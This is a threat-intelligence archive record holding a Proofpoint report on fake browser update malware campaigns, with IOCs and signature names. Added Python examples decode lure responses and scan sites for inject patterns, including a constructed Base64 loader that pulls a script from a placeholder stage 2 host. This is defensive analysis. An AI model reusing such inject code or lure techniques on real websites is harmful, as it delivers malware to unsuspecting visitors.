{
	"id": "99a08e74-79ac-4498-9c0c-94277b5dc968",
	"created_at": "2026-04-06T00:12:12.985471Z",
	"updated_at": "2026-04-10T03:33:16.462893Z",
	"deleted_at": null,
	"sha1_hash": "85e7565128b2876891f5dc9a7c4facad7071f539",
	"title": "Beware Fake Browser Updates: TA569, Rogueraticate \u0026 More | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1819950,
	"plain_text": "Beware Fake Browser Updates: TA569, Rogueraticate \u0026 More |\r\nProofpoint US\r\nBy Dusty Miller, October 17, 2023\r\nPublished: 2023-10-09 · Archived: 2026-04-05 21:42:03 UTC\r\nKey Takeaways \r\nProofpoint is tracking multiple different threat clusters that use similar themes related to fake browser\r\nupdates. \r\nFake browser updates abuse end user trust with compromised websites and a lure customized to the user's\r\nbrowser to legitimize the update and fool users into clicking. \r\nThreat actors do not send emails to share the compromised websites. The threat is only in the browser and\r\ncan be initiated by a click from a legitimate and expected email, social media site, search engine query, or\r\neven just navigating to the compromised site. \r\nThe different campaigns use similar lures, but different payloads. It is important to identify which\r\ncampaign and malware cluster the threat belongs to in order to guide defender response. \r\nOverview \r\nProofpoint is currently tracking at least four distinct threat clusters that use fake browser updates to distribute\r\nmalware. Fake browser updates refer to compromised websites that display what appears to be a notification from\r\nthe browser developer such as Chrome, Firefox, or Edge, informing visitors that their browser software needs to be\r\nupdated. When a user clicks on the link, they do not download a legitimate browser update but rather harmful\r\nmalware. \r\nBased on our research, TA569 has used fake browser updates for over five years to deliver SocGholish malware,\r\nbut recently other threat actors have been copying the lure theme. Each threat actor uses their own methods to\r\ndeliver the lure and payload, but the theme takes advantage of the same social engineering tactics. The use of fake\r\nbrowser updates is unique because it abuses the trust end users place in both their browser and the known sites\r\nthat they visit. 
\r\nThreat actors that control the fake browser updates use injected JavaScript or HTML that directs traffic to a\r\ndomain they control, which can potentially overwrite the webpage with a browser update lure specific to the web\r\nbrowser that the potential victim uses. A malicious payload will then automatically download, or the user will\r\nreceive a prompt to download a “browser update,” which will deliver the payload. \r\nFake browser update lure and effectiveness \r\nhttps://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates\r\nPage 1 of 9\n\nThe fake browser update lures are effective because threat actors are using an end user's security training against\r\nthem. In security awareness training, users are told to only accept updates or click on links from known and\r\ntrusted sites or individuals, and to verify that sites are legitimate. The fake browser updates abuse this training because\r\nthey compromise trusted sites and use JavaScript requests to quietly make checks in the background and\r\noverwrite the existing website with a browser update lure. To an end user, it still appears to be the same website\r\nthey were intending to visit, which is now asking them to update their browser. \r\nProofpoint has not identified threat actors directly sending emails containing malicious links, but, due to the\r\nnature of the threat, compromised URLs are observed in email traffic in a variety of ways. They are seen in\r\nnormal email traffic from regular end users who are unaware of the compromised websites, in monitoring emails\r\nsuch as Google alerts, or in mass automated email campaigns like those distributing newsletters. This creates a\r\nsituation where these emails are considered to be malicious during the time the site is compromised. 
Organizations\r\nshould not treat the fake browser update threats as only an email problem, as end users could visit the site from\r\nanother source, such as a search engine, social media site, or simply navigate to the site directly and receive the\r\nlure and potentially download the malicious payload. \r\nEach campaign filters traffic in its own way to hide from researchers and delay discovery, and all of the methods are\r\neffective. While this may reduce the potential spread of malicious payloads, it enables actors to\r\nmaintain their access to the compromised sites for longer periods of time. This can complicate the response,\r\nbecause with the multiple campaigns and changing payloads, responders must take time to figure out what they\r\nneed to look for and identify the relevant indicators of compromise (IOCs) at the time of the download. \r\nCampaigns \r\nThe current landscape includes four different threat clusters using unique campaigns to deliver fake browser\r\nupdate lures. Due to the similarity in the lures and attack chain, some public reporting has incorrectly attributed\r\nthe activity to the same threat cluster. Based on Proofpoint's distinct visibility, Proofpoint researchers were able to\r\nbreak these into more granular clusters. \r\nProofpoint’s research focuses on the fake browser update landscape overall, to provide details on how defenders\r\ncan identify each unique campaign, as well as links to additional Proofpoint or third-party reporting\r\ncontaining in-depth research and analysis. For example, Jérôme Segura of Malwarebytes has put together a good\r\nresource on GitHub showing some of the images each campaign uses as lures. \r\nEach campaign has some general shared characteristics that can be described as three distinct stages of the\r\ncampaign. “Stage 1” is a malicious injection on a legitimate, but compromised, website. 
“Stage 2” refers to the\r\ntraffic to and from the actor-controlled domain that does most of the filtering and hosts the lure and malicious\r\npayload. “Stage 3” is the execution of the payload on a host after download. \r\nSocGholish\r\nSocGholish is the primary threat that people think of when talking about a fake browser update lure and it has\r\nbeen well documented over the years. Proofpoint typically attributes SocGholish campaigns to a threat actor\r\nknown as TA569. Proofpoint has observed TA569 act as a distributor for other threat actors. \r\nCurrently, TA569 is using three different methods to direct traffic from the stage 1 compromised websites to their\r\nactor-controlled stage 2 shadowed domains. \r\nThe first method is an injection that utilizes the Keitaro traffic distribution system (TDS) via a variety of\r\nactor-controlled domains. Those domains will filter some requests out before routing to the stage 2 domains. Most\r\nof the injects that point to Keitaro TDS URLs will contain multiple different redirect domains in the same file, as\r\nseen in Figure 2 below. \r\nThe second method TA569 uses is Parrot TDS (also known as NDSW/NDSX) to obfuscate their injected code and\r\napply similar filtering before routing requests to the stage 2 domains. Compromised websites may contain as\r\nmany as 10 malicious JavaScript files that all contain Parrot TDS injections leading to SocGholish payloads. \r\nThe third method TA569 uses is a simple asynchronous JavaScript script request in compromised websites’ HTML\r\nthat reaches out to a stage 2 domain. \r\nThe variety of injections makes it difficult for defenders to both identify the location of the malicious injection and\r\nreproduce the traffic due to the various stages of filtering. 
\r\nEach of these methods reaches out to a stage 2 domain which does additional filtering and will deliver the fake\r\nbrowser update lure and payload to traffic that passes the filtering. The payload can be either a plain JavaScript\r\n(.js) file, usually named “Update.js”, or a zipped JavaScript file. If the payload is executed by the user, it will first\r\nfingerprint the host via wscript. Depending on the results of the fingerprinting, the JavaScript will either quit, load\r\na remote access trojan (RAT), or wait for further commands from the threat actor, which has been reported to lead\r\nto Cobalt Strike or BLISTER Loader. Proofpoint has recently observed SocGholish infections leading to\r\nAsyncRAT and NetSupport RAT as the RAT payloads. \r\nFigure 1. SocGholish fake update lure spoofing a Chrome update. \r\nFigure 2. Keitaro TDS inject example. \r\nFigure 3. Parrot (NDSW) inject example. \r\nFigure 4. Asynchronous inject example. \r\nRogueRaticate/FakeSG \r\nThe second fake browser update cluster our researchers identified is known as RogueRaticate or FakeSG. Proofpoint first\r\nidentified this activity in May 2023, and third-party researchers dubbed it a copy of the existing and high-volume\r\nSocGholish campaigns. The activity may have started in the wild as early as November 2022. Proofpoint does not\r\nattribute the RogueRaticate activity to a tracked threat actor at this time, and it has consistently been distinctly\r\ndifferentiated from SocGholish campaigns. \r\nRogueRaticate injects heavily obfuscated JavaScript code into existing JavaScript files on stage 1 websites. The\r\ninjected JavaScript reaches out to a stage 2 domain. The stage 2 domain hosts a Keitaro TDS that filters out\r\nunwanted requests and responds with a blank “body” value in a JSON response. 
When it identifies a target to\r\nreceive the lure, it sends the lure double Base64 encoded in the “body” value. The lure contains a button which, if\r\npressed, uses an HTML href attribute to download the payload from a separate compromised site, typically hosted\r\non WordPress. \r\nThe fake update payload for the RogueRaticate campaigns has always involved an HTML Application (.hta) file.\r\nThe HTA is either zipped or downloaded via an internet shortcut (.url) file that points to the .hta. The .hta file typically\r\nloads a malicious NetSupport RAT payload onto the host via the same stage 2 domain that served the lure. \r\nFigure 5. Example RogueRaticate fake update lure spoofing a Chrome update. \r\nFigure 6. Example RogueRaticate inject. \r\nZPHP/SmartApeSG \r\nProofpoint first identified another new cluster of fake update campaigns leading to NetSupport RAT in June 2023.\r\nThe activity was first publicly reported by Trellix in August 2023. This activity has been referred to as ZPHP by\r\nProofpoint or SmartApeSG in public documentation. The inject is a simple script object that is added into a\r\ncompromised website’s HTML code. It makes an asynchronous request to either “/cdn/wds.min.php” or “/cdn-js/wds.min.php” on a stage 2 domain. The response is heavily obfuscated JavaScript code that will attempt to\r\ncreate an iframe and make a second request to “/zwewmrqqgqnaww.php?reqtime=\u003cepoch time\u003e” which appears\r\nto filter out undesired requests and return the browser update lure to non-filtered requests. The payload is\r\ndownloaded as a base64 encoded zip file. 
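The stage 2 replies described for RogueRaticate (a JSON object whose body value is blank for filtered visitors and double Base64 encoded lure HTML otherwise) and for ZPHP (a Base64 encoded zip) can be unpacked offline once a capture is in hand, so the next indicator to pivot on (the payload host or the archive member) falls out without re-requesting anything from actor infrastructure. The Python below is an added example written for this page; it is not Proofpoint code and not material from the campaigns. The sample JSON reply, the lure HTML, its download host and the zip contents are constructed placeholders, and the assumption that the lure button is an ordinary anchor tag with an href is this example's, not something the report states.

```python
import base64
import binascii
import io
import json
import zipfile
from html.parser import HTMLParser

DQ = chr(34)   # double quote, built with chr() so the character stays out of the source


def double_b64(text):
    '''Encode text the way the RogueRaticate body value arrives: Base64 applied twice.'''
    return base64.b64encode(base64.b64encode(text.encode('utf-8'))).decode('ascii')


class HrefCollector(HTMLParser):
    '''Collect href targets of anchor tags, whichever quoting the lure HTML uses.'''
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            self.hrefs.extend(v for k, v in attrs if k == 'href' and v)


def decode_rogueraticate_body(raw_json):
    '''Decode one stage 2 reply. Returns None for a blank body (visitor filtered)
    or for a body that is not double Base64, and the lure HTML otherwise.'''
    body = json.loads(raw_json).get('body') or ''
    if not body:
        return None
    try:
        once = base64.b64decode(body, validate=True)
        return base64.b64decode(once, validate=True).decode('utf-8', 'replace')
    except (binascii.Error, ValueError):
        return None


def lure_download_urls(raw_json):
    '''URLs the lure button(s) point at; the payload host is the next thing to pivot on.
    Assumption of this example: the button is an ordinary anchor with an href.'''
    html = decode_rogueraticate_body(raw_json)
    if html is None:
        return []
    collector = HrefCollector()
    collector.feed(html)
    return collector.hrefs


def zphp_zip_members(b64_zip):
    '''Decode a Base64 encoded zip as ZPHP delivers it and list its members.
    Returns None when the blob is not a zip, so a filtered or truncated reply is
    not mistaken for an empty archive.'''
    try:
        blob = base64.b64decode(b64_zip, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not blob.startswith(b'PK'):
        return None
    with zipfile.ZipFile(io.BytesIO(blob)) as archive:
        return archive.namelist()


def payload_kind(members):
    '''Map archive contents to the two post-download paths the report describes.'''
    lowered = [m.lower() for m in members]
    if any(m.endswith('.exe') for m in lowered):
        return 'executable'    # seen loading Lumma Stealer
    if any(m.endswith('.js') for m in lowered):
        return 'javascript'    # seen loading NetSupport RAT
    return 'other'


def build_sample_zip(member_name):
    '''Constructed stand-in for a ZPHP payload archive (the member is inert text).'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as archive:
        archive.writestr(member_name, 'placeholder, not malware')
    return base64.b64encode(buf.getvalue()).decode('ascii')


# Constructed sample replies; the download host is a placeholder, not an indicator.
LURE_HTML = ('<html><body><h1>Update Chrome</h1><a href=' + DQ +
             'https://compromised-blog.example/wp-content/Update.hta' + DQ + '>Update</a></body></html>')
SAMPLE_HIT = json.dumps({'body': double_b64(LURE_HTML)})   # visitor passed the Keitaro filter
SAMPLE_FILTERED = json.dumps({'body': ''})                 # visitor was filtered out

if __name__ == '__main__':
    print(lure_download_urls(SAMPLE_HIT))        # the payload host to pivot on
    print(lure_download_urls(SAMPLE_FILTERED))   # [] : nothing was served
    sample = build_sample_zip('ChromeUpdate.js')
    print(zphp_zip_members(sample), payload_kind(zphp_zip_members(sample)))
```

Both decoders fail closed: a blank body, a non-Base64 body, or a blob without a zip header comes back as None or an empty list rather than as a partial result, which matters when the same script is pointed at a batch of captures where most visitors were filtered.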
\r\nThe zipped browser update payload usually contains a JavaScript (.js) file that will load a malicious NetSupport\r\nRAT payload onto the host. Proofpoint has also seen the .zip contain an executable (.exe) that loaded Lumma\r\nStealer. \r\nFigure 7. Example ZPHP lure spoofing a Chrome update. \r\nFigure 8. Example ZPHP inject. \r\nProofpoint does not currently attribute the ZPHP activity to an actor with a TA number designation. \r\nClearFake \r\nIn August 2023, third-party researchers published details on a fake browser update threat activity known as\r\nClearFake. Proofpoint subsequently identified consistent campaigns related to this cluster and observed a series of\r\nchanges in the short amount of time while monitoring it. The inject is a base64 encoded script added to the HTML\r\nof the compromised webpage. Proofpoint observed the injection pointing to a variety of services including\r\nCloudflare Workers, a file hosted on an actor’s GitHub, and most recently the blockchain network known as\r\nBinance Smart Chain. The initial request directs traffic to a stage 2 domain that hosts the Keitaro TDS filtering\r\nservice to filter requests. The actor uses newly registered stage 2 domains, which, if a visitor passes the filtering,\r\ncreate an iframe of the fake update lure hosted on the stage 2 domain. Clicking on the update button will result in\r\na download of the payload, which has been observed hosted on Dropbox and OneDrive. \r\nThe observed payload was an executable (sometimes zipped), an .msi, or an .msix that leads to the installation of\r\na variety of stealers including Lumma, Redline, and Raccoon v2. \r\nFigure 9. Example ClearFake lure spoofing a Chrome update. 
\r\nFigure 10. Example ClearFake injection. \r\nNotably, Proofpoint has observed ClearFake display the fake update lures in certain languages to match the\r\nbrowser's set language, including French, German, Spanish, and Portuguese. Proofpoint does not attribute the\r\nClearFake activity to an actor with a TA number designation. \r\nConclusion \r\nProofpoint has observed an increase in threat activity using fake browser updates to deliver a variety of malware\r\npayloads. SocGholish and TA569 have demonstrated that compromising vulnerable websites to display\r\nfake browser updates works as a viable method for malware delivery, and new actors have learned from TA569\r\nand started to adopt the lure in their own ways. These copycats may be using information stealers and RATs\r\ncurrently, but could easily pivot to being an initial access broker for ransomware. \r\nThe activity detailed in this report can be hard for security teams to detect and prevent and may present difficulties\r\nwith communicating the threat to end users due to the social engineering techniques and website compromises\r\nused by the threat actors. The best mitigation is defense in depth. Organizations should have network detections in\r\nplace – including using the Emerging Threats ruleset – and use endpoint protection. Additionally, organizations\r\nshould train users to identify the activity and report suspicious activity to their security teams. This is very specific\r\ntraining but can easily be integrated into an existing user training program. A tool such as Proofpoint’s Browser\r\nIsolation can also help prevent successful exploitation when compromised URLs are received via email and\r\nclicked on. 
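Network rules catch stage 2 traffic once it happens; the stage 1 injects described in the campaign sections can also be hunted for in a site's own HTML and JavaScript before any visitor is served a lure: an asynchronous script tag reaching an external domain (TA569's third method), a request path ending in wds.min.php (ZPHP), a Base64 encoded inline script (ClearFake), Parrot TDS code carrying the NDSW/NDSX identifiers it is named after, and Keitaro injects that list several redirect domains in one file. The Python below is an added example for this page rather than code from Proofpoint or from any of the campaigns. The sample page, the JavaScript files and every domain in them are constructed placeholders, and the specific heuristics (an atob() wrapper around the encoded script, three or more external hosts as the Keitaro threshold, a case-insensitive ndsw/ndsx match) are assumptions of this example rather than findings of the report.

```python
import base64
import binascii
from html.parser import HTMLParser
from urllib.parse import urlparse

DQ, SQ = chr(34), chr(39)   # quote characters, built with chr() so neither appears in the source
URL_STOP = set(DQ + SQ + '<>()[]{};,')


def extract_urls(text):
    '''Return every http(s) URL embedded in a blob of HTML or JavaScript, in order.'''
    urls = []
    for chunk in text.replace('http://', ' http://').replace('https://', ' https://').split():
        if chunk.startswith(('http://', 'https://')):
            end = next((i for i, c in enumerate(chunk) if c in URL_STOP), len(chunk))
            urls.append(chunk[:end])
    return urls


def host_of(url):
    return (urlparse(url).hostname or '').lower()


def decode_atob_literals(js):
    '''Decode Base64 literals passed to atob(). That the encoded inline script is
    unwrapped with atob() is an assumption of this example, not a report finding.'''
    decoded, start = [], 0
    while True:
        idx = js.find('atob(', start)
        if idx < 0:
            break
        quote_pos = idx + len('atob(')
        if quote_pos >= len(js) or js[quote_pos] not in (DQ, SQ):
            start = quote_pos
            continue
        close = js.find(js[quote_pos], quote_pos + 1)
        if close < 0:
            break
        try:
            raw = base64.b64decode(js[quote_pos + 1:close], validate=True)
            decoded.append(raw.decode('utf-8', 'replace'))
        except (binascii.Error, ValueError):
            pass   # not valid Base64; skip this literal
        start = close + 1
    return decoded


class ScriptCollector(HTMLParser):
    '''Collect external script tags (src, async flag) and inline script bodies.'''
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag != 'script':
            return
        attrs = dict(attrs)
        if attrs.get('src'):
            self.external.append((attrs['src'], 'async' in attrs))
        else:
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == 'script':
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def scan_page(html, site_host, js_files=None):
    '''Scan a page and the JavaScript files it serves (name -> source) for the
    inject shapes described above. Returns (rule, detail) hunting leads.'''
    site_host, findings, parser = site_host.lower(), [], ScriptCollector()
    parser.feed(html)
    for src, is_async in parser.external:
        if urlparse(src).path.lower().endswith('wds.min.php'):
            findings.append(('zphp_inject', src))            # /cdn/wds.min.php or /cdn-js/wds.min.php
        elif is_async and host_of(src) not in ('', site_host):
            findings.append(('async_external_script', src))  # SocGholish third method
    for body in parser.inline:
        for url in (u for text in decode_atob_literals(body) for u in extract_urls(text)):
            findings.append(('base64_script_inject', url))   # ClearFake style
    for name, js in (js_files or {}).items():
        if 'ndsw' in js.lower() or 'ndsx' in js.lower():
            findings.append(('parrot_tds_marker', name))     # Parrot TDS, a.k.a. NDSW/NDSX
        hosts = {host_of(u) for u in extract_urls(js)} - {'', site_host}
        if len(hosts) >= 3:   # Keitaro injects carry several redirect domains; the threshold is this example's
            findings.append(('multi_domain_redirect', name + ': ' + ', '.join(sorted(hosts))))
    return findings


def b64(text):
    return base64.b64encode(text.encode('ascii')).decode('ascii')


# Constructed sample input, not a real compromised site; every host below is a placeholder.
SITE = 'news.example'
ENCODED_LOADER = b64('var s=document.createElement(' + DQ + 'script' + DQ + ');s.src=' + DQ +
                     'https://worker-stage2.example/lander.js' + DQ + ';document.head.appendChild(s);')
SAMPLE_HTML = ('<html><head><script src=' + DQ + 'https://news.example/assets/app.js' + DQ + '></script>'
               '<script async src=' + DQ + 'https://stats-stage2.example/loader.js' + DQ + '></script>'
               '<script async src=' + DQ + 'https://cdn-stage2.example/cdn/wds.min.php' + DQ + '></script>'
               '<script>eval(atob(' + DQ + ENCODED_LOADER + DQ + '));</script></head><body></body></html>')
SAMPLE_JS_FILES = {
    'jquery.min.js': 'if(ndsw===undefined){var ndsx=true;}',   # Parrot TDS style marker
    'theme.js': 'var r=[' + DQ + 'https://tds-a.example/go' + DQ + ',' + DQ + 'https://tds-b.example/go' +
                DQ + ',' + DQ + 'https://tds-c.example/go' + DQ + '];',
}

if __name__ == '__main__':
    for rule, detail in scan_page(SAMPLE_HTML, SITE, SAMPLE_JS_FILES):
        print(rule, detail)
```

Run against a real site, scan_page takes the HTML of one page and a dict of the JavaScript files it serves; the findings are leads to confirm by hand, since legitimate analytics and ad tags also load async scripts from third-party hosts, and the Base64 decoding deliberately surfaces the domain behind the encoded script rather than trying to judge the script itself.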
\r\nSpecific indicators of compromise (IOCs) associated with the identified activities change regularly, as the threat\r\nactors are routinely moving their infrastructure and changing details in their payloads. The infosec.exchange\r\naccount @monitorsg is a useful public resource for following along with recent details on payloads and\r\ninfrastructure changes. The Emerging Threats Ruleset has domain rules available for most of the current threats\r\nand is regularly updating and publishing new rules to block all fake browser update campaigns. \r\nHunting IOCs and Payload Examples (As of 2023-09-28): \r\nSocGholish: \r\nC2 URI: \r\n/editContent \r\n8bdc4c1cd197808056e50b8b958acd380bf8a69b63aedef3f9854173c6714b32 \r\n3fb9740940d44eef823b7ff17f0274a12345a6f238cf46a1133a9e39c7b97c62 \r\nRogueRaticate: \r\nKeitaro TDS Hosted on: \r\n178.159.37.73 \r\n178.159.37.25 \r\n1d9900c8dbaa47d2587d08b334d483b06a39acb27f83223efc083759f1a7a4f6 \r\n08d9df800127f9fb7ff1a246346e1cf5cfef9a2521d40d6b2ab4e3614a19b772 \r\nZPHP: \r\nInjects lead to paths: \r\n/cdn/wds.min.php \r\n/cdn-js/wds.min.php \r\n/cdn/zwmrqqgqnaww.php \r\n/cdn/zwewmrqqgqnaww.php \r\ne9580370160d39ef010dfdbfa614820cfe464507ce344a11bcbe760902297c8f \r\n0b28e9df9daf8a3d0aa3dc8a066a34134916dfacd9ba5d25d78e097525f66492 \r\nClearFake: \r\nChrome lure on: \r\n/lander/chrome/_index.php \r\n37bba90d20e429ce3fd56847e4e7aaf83c62fdd70a7dbdcd35b6f2569d47d533 \r\nab282db6f1fc4b58272cef47522be19d453126b69f0e421da24487f54d611b2f \r\nEmerging Threats Signatures: (All Open Sigs available for free) \r\n“ET MALWARE SocGholish Domain in (DNS Lookup/TLS SNI) (\u003cdomain\u003e)” \r\n“ET MALWARE SocGholish CnC Domain in (DNS Lookup/TLS SNI) (\u003cdomain\u003e)” \r\n“ET EXPLOIT_KIT RogueRaticate Domain in (DNS Lookup/TLS SNI) (\u003cdomain\u003e)” \r\n“ET EXPLOIT_KIT Keitaro Set-Cookie Inbound to 
RogueRaticate (4cdcb)” \r\n“ET EXPLOIT_KIT Keitaro Set-Cookie Inbound to RogueRaticate (3a7ee)” \r\n“ET EXPLOIT_KIT Keitaro Set-Cookie Inbound to ClearFake (71eb8)” \r\n“ET EXPLOIT_KIT ZPHP Domain in (DNS Lookup/TLS SNI) (\u003cdomain\u003e)” \r\nSource: https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates"
	],
	"report_names": [
		"are-you-sure-your-browser-date-current-landscape-fake-browser-updates"
	],
	"threat_actors": [
		{
			"id": "ebc139d2-7450-46f5-a9e4-e7d561133fa5",
			"created_at": "2024-04-24T02:00:49.453475Z",
			"updated_at": "2026-04-10T02:00:05.321256Z",
			"deleted_at": null,
			"main_name": "Mustard Tempest",
			"aliases": [
				"Mustard Tempest",
				"DEV-0206",
				"TA569",
				"GOLD PRELUDE",
				"UNC1543"
			],
			"source_name": "MITRE:Mustard Tempest",
			"tools": [
				"SocGholish",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3bf456e4-84ee-48fd-b3ab-c10d54a48a34",
			"created_at": "2024-06-19T02:03:08.096988Z",
			"updated_at": "2026-04-10T02:00:03.82859Z",
			"deleted_at": null,
			"main_name": "GOLD PRELUDE",
			"aliases": [
				"Mustard Tempest ",
				"TA569 ",
				"UNC1543 "
			],
			"source_name": "Secureworks:GOLD PRELUDE",
			"tools": [
				"SocGholish"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "544cac23-af15-4100-8f20-46c07962cbfa",
			"created_at": "2023-01-06T13:46:39.484133Z",
			"updated_at": "2026-04-10T02:00:03.34364Z",
			"deleted_at": null,
			"main_name": "GOLD PRELUDE",
			"aliases": [
				"TA569",
				"UNC1543"
			],
			"source_name": "MISPGALAXY:GOLD PRELUDE",
			"tools": [
				"FakeUpdates",
				"FakeUpdate",
				"SocGholish"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434332,
	"ts_updated_at": 1775791996,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/85e7565128b2876891f5dc9a7c4facad7071f539.pdf",
		"text": "https://archive.orkl.eu/85e7565128b2876891f5dc9a7c4facad7071f539.txt",
		"img": "https://archive.orkl.eu/85e7565128b2876891f5dc9a7c4facad7071f539.jpg"
	}
}